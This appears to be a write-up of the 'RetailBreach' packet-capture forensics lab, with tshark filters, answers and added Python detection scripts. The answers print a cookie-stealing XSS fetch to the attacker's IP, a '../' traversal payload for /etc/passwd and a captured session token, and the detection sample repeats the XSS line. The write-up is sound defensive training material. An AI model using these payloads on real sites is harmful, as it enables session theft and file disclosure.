# RetailBreach Lab

Q1) In the realm of cybersecurity, identifying the attacker's IP address is pivotal for mapping the attack's scope and strategizing an effective response. What is the IP address associated with the attacker?

<figure><img src="/files/1eQKnj6zBoAqY6SCRkua" alt=""><figcaption></figcaption></figure>

Answer: 111.224.180.128

Q2) Directory brute-forcing tools are known to be used by attackers seeking to uncover hidden paths within web applications. Which tool was employed by the attacker to perform directory brute-forcing?

```bash
tshark -r RetailBreach.pcap -Y "ip.addr==111.224.180.128" -T fields -e http.user_agent | sort | uniq
```

<figure><img src="/files/j8FlcLhZMSZdcpQk5Tyw" alt=""><figcaption></figcaption></figure>

Answer: gobuster
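The two tshark steps above (top talker, then that host's User-Agent strings) can be automated over the field output. The script below is an added example, not part of the CyberDefenders lab or this writeup; it assumes tab-separated output from a tshark invocation such as `tshark -r RetailBreach.pcap -Y http.request -T fields -E separator=/t -e ip.src -e http.user_agent -e http.request.uri`, and the sample lines embedded in it are constructed (the 203.0.113.7 address is a documentation-range placeholder, not the lab's attacker IP).

```python
"""Triage tshark field output: noisiest client and scanner-style User-Agents.

Added example; not the lab's or the writeup's own code. Input format assumed:
ip.src <TAB> http.user_agent <TAB> http.request.uri, one HTTP request per line.
"""
from collections import Counter, defaultdict

# Constructed sample of tshark -T fields output (ip.src \t user_agent \t uri).
SAMPLE_TSV = """\
10.0.0.5\tMozilla/5.0 (X11; Linux x86_64) Firefox/124.0\t/index.php
203.0.113.7\tgobuster/3.6\t/admin
203.0.113.7\tgobuster/3.6\t/backup
203.0.113.7\tgobuster/3.6\t/uploads
203.0.113.7\tgobuster/3.6\t/config
203.0.113.7\tMozilla/5.0 (X11; Linux x86_64) Firefox/124.0\t/review.php
10.0.0.8\tMozilla/5.0 (Windows NT 10.0) Chrome/123.0\t/index.php
"""

# Substrings that commonly identify enumeration tooling in a User-Agent header.
KNOWN_SCANNER_UA = ("gobuster", "dirb", "ffuf", "nikto", "sqlmap", "nmap")


def parse_tsv(text):
    """Split tshark field output into dicts; missing trailing fields become ''."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t")
        while len(parts) < 3:
            parts.append("")
        rows.append({"src": parts[0], "ua": parts[1], "uri": parts[2]})
    return rows


def requests_per_source(rows):
    """Request count per source IP; the outlier is the first host to look at."""
    return Counter(r["src"] for r in rows)


def user_agents_by_source(rows):
    """Distinct User-Agent strings each source IP presented."""
    uas = defaultdict(set)
    for r in rows:
        uas[r["src"]].add(r["ua"])
    return uas


def scanner_user_agents(rows):
    """Map source IP -> set of scanner names matched in its User-Agents (case-insensitive)."""
    hits = defaultdict(set)
    for r in rows:
        ua = r["ua"].lower()
        for name in KNOWN_SCANNER_UA:
            if name in ua:
                hits[r["src"]].add(name)
    return dict(hits)


def triage(text):
    """Answer the Q1/Q2-style questions in one pass over the field output."""
    rows = parse_tsv(text)
    counts = requests_per_source(rows)
    top_ip, top_n = counts.most_common(1)[0]
    return {
        "top_source": top_ip,
        "top_count": top_n,
        "scanners": scanner_user_agents(rows),
        "user_agents": {ip: sorted(v) for ip, v in user_agents_by_source(rows).items()},
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TSV).items():
        print(f"{key}: {value}")
```

A host that presents both a tool User-Agent and a browser User-Agent within the same capture, as the sample does, is worth noting: the browser string is what the attacker's later, hands-on requests will carry, so pivoting on the IP rather than the User-Agent is the more reliable filter.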

Q3) Cross-Site Scripting (XSS) allows attackers to inject malicious scripts into web pages viewed by users. Could you specify the XSS payload that was utilized by the attacker to compromise the web application's integrity?

```
ip.addr==111.224.180.128 and http.request.method == "POST"
```

<figure><img src="/files/rWeCbeu8Cm4KP37bKHbu" alt=""><figcaption></figcaption></figure>

```bash
tshark -r RetailBreach.pcap -Y 'http.request.method == POST' -T fields -e text
```

<figure><img src="/files/zcOdTDMdulQlJRa6pJ1t" alt=""><figcaption></figcaption></figure>

Answer: `fetch('http://111.224.180.128/' + document.cookie);`

Q4) Pinpointing the exact moment an admin user encounters the injected malicious script is crucial for understanding the timeline of a security breach. Can you provide the UTC timestamp when the admin user first visited the page containing the injected malicious script?

```
http.request.uri contains "review"
```

<figure><img src="/files/njcsVvRVR32n1SoM997c" alt=""><figcaption></figcaption></figure>

Answer: 29-03-2024 12:09:50

Q5) The act of stealing a session token via XSS is a critical security breach, enabling unauthorized access. Can you provide the session token acquired and used by the attacker for unauthorized access?

```
http.request.uri contains "review"
```

<figure><img src="/files/tlexXKVZioV32orTLUwh" alt=""><figcaption></figcaption></figure>

Answer: lqkctf24s9h9lg67teu8uevn3q

Q6) Identifying which scripts have been exploited is a key step in mitigating vulnerabilities within a web application. What is the name of the script that was exploited by the attacker?

```
http contains "admin"
```

<figure><img src="/files/yESe8BgPZx33dw6TukYp" alt=""><figcaption></figcaption></figure>

Answer: `log_viewer.php`

Q7) Exploiting vulnerabilities to access sensitive system files is a common tactic among attackers. Can you identify the payload that was used by the attacker to gain access to a sensitive system file?

```
http contains "admin"
```

<figure><img src="/files/JSEGV4Nc72IuN7phrNqP" alt=""><figcaption></figcaption></figure>

Answer: `../../../../../etc/passwd`
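Q3, Q5, Q6 and Q7 were each answered by eyeballing a display filter; the same three indicators (a script payload in a request body, one session cookie presented from two different source IPs, and a percent-encoded `../` sequence) can be checked programmatically over decoded requests. This is an added example, not code from the lab or the writeup; it assumes request records extracted from a capture (for instance with `tshark -T fields` and `-e ip.src -e http.request.uri -e http.cookie -e http.file_data`) and the records below are constructed, using a documentation-range address and a made-up session token.

```python
"""Flag stored-XSS, session-reuse and path-traversal indicators in HTTP requests.

Added example; not the lab's or the writeup's own code. Records are assumed to
be decoded HTTP requests with source IP, request URI, Cookie header and body.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed records: a posted review containing a script, an admin reading it,
# the same session token reappearing from a second IP, then a traversal attempt.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "uri": "/review.php", "cookie": "",
     "body": "name=x&review=%3Cscript%3Efetch%28%27http%3A%2F%2F203.0.113.7%2F%27"
             "%2Bdocument.cookie%29%3B%3C%2Fscript%3E"},
    {"src": "10.0.0.5", "uri": "/review.php", "cookie": "PHPSESSID=constructedsessiontoken1", "body": ""},
    {"src": "203.0.113.7", "uri": "/admin/", "cookie": "PHPSESSID=constructedsessiontoken1", "body": ""},
    {"src": "203.0.113.7", "uri": "/admin/log_viewer.php?file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
     "cookie": "PHPSESSID=constructedsessiontoken1", "body": ""},
    {"src": "10.0.0.8", "uri": "/index.php", "cookie": "PHPSESSID=othertoken2", "body": ""},
]

# Conservative signatures; tune to the application before using as alerts.
XSS_PATTERNS = [re.compile(p, re.I) for p in (r"<script\b", r"document\.cookie",
                                                r"\bon\w+\s*=", r"javascript:")]
TRAVERSAL = re.compile(r"(\.\./|\.\.\\)")
SESSION_COOKIE = re.compile(r"PHPSESSID=([A-Za-z0-9]+)")


def full_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_xss(record):
    """Return the XSS pattern strings that match the decoded URI or body."""
    text = full_decode(record["uri"] + "\n" + record["body"])
    return [p.pattern for p in XSS_PATTERNS if p.search(text)]


def find_traversal(record):
    """Return the decoded URI when it contains a parent-directory sequence, else None."""
    uri = full_decode(record["uri"])
    return uri if TRAVERSAL.search(uri) else None


def session_reuse(records):
    """Session tokens presented from more than one source IP (hijack indicator)."""
    seen = defaultdict(set)
    for r in records:
        m = SESSION_COOKIE.search(r["cookie"])
        if m:
            seen[m.group(1)].add(r["src"])
    return {tok: ips for tok, ips in seen.items() if len(ips) > 1}


def analyse(records):
    """Collect all three indicator types into one findings dict."""
    findings = {"xss": [], "traversal": [], "session_reuse": session_reuse(records)}
    for r in records:
        hits = find_xss(r)
        if hits:
            findings["xss"].append((r["src"], r["uri"], hits))
        path = find_traversal(r)
        if path:
            findings["traversal"].append((r["src"], path))
    return findings


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_REQUESTS).items():
        print(f"{key}: {value}")
```

Decoding before matching is the detail that matters: the traversal in the sample is only visible after `%2F` is turned back into `/`, and `full_decode` also unwraps a double-encoded `%252e%252e%252f`. The session-reuse check is the cheapest of the three and is what would have surfaced the hijacked admin session in Q5 without reading packet bodies.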

